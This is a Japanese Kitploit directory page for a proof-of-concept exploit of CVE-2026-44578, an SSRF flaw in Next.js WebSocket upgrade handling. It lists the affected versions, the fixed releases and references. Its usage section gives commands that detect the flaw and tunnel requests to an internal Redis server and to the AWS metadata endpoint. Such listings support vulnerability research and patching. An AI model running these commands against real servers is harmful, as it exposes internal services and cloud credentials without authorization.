Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-44578-PoC — CVE-2026-44578 の概念実証エクスプロイト。Next.js WebSocket アップグレードハンドラーにおけるサーバーサイドリクエストフォージェリ。検出モードと、Redis やクラウドメタデータエンドポイントなどの内部サービスへのトンネリングが含まれます。 | Kitploit
ツール/GitHubGitHub/tocong282/cve-2026-44578-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストクラウドセキュリティ
GitHubtocong282/cve-2026-44578-poc

CVE-2026-44578-PoC

CVE-2026-44578 の概念実証エクスプロイト。Next.js WebSocket アップグレードハンドラーにおけるサーバーサイドリクエストフォージェリ。検出モードと、Redis やクラウドメタデータエンドポイントなどの内部サービスへのトンネリングが含まれます。

リポジトリを見る
353ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-44578 - Next.js WebSocket SSRF PoC

脆弱性: Next.js WebSocket アップグレードハンドラーにおけるサーバーサイドリクエストフォージェリ (13.4.13 → 15.5.15, 16.0.0 → 16.1.6)

使用方法

root@kitploit:~
# Detect vulnerability
python3 poc.py target.com:3000 --detect

# Tunnel to internal Redis
python3 poc.py target.com:3000 --internal 127.0.0.1:6379 --payload "INFO\r\n"

# Tunnel to AWS metadata
python3 poc.py target.com:3000 --internal 169.254.169.254:80 --payload "GET /latest/meta-data/ HTTP/1.0\r\n\r\n"

修正

Next.js 15.5.16 または 16.2.5 にアップグレードしてください。

参照

  • https://hadrian.io/blog/next-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2
  • GHSA-c4j6-fc7j-m34r
ツールをダウンロード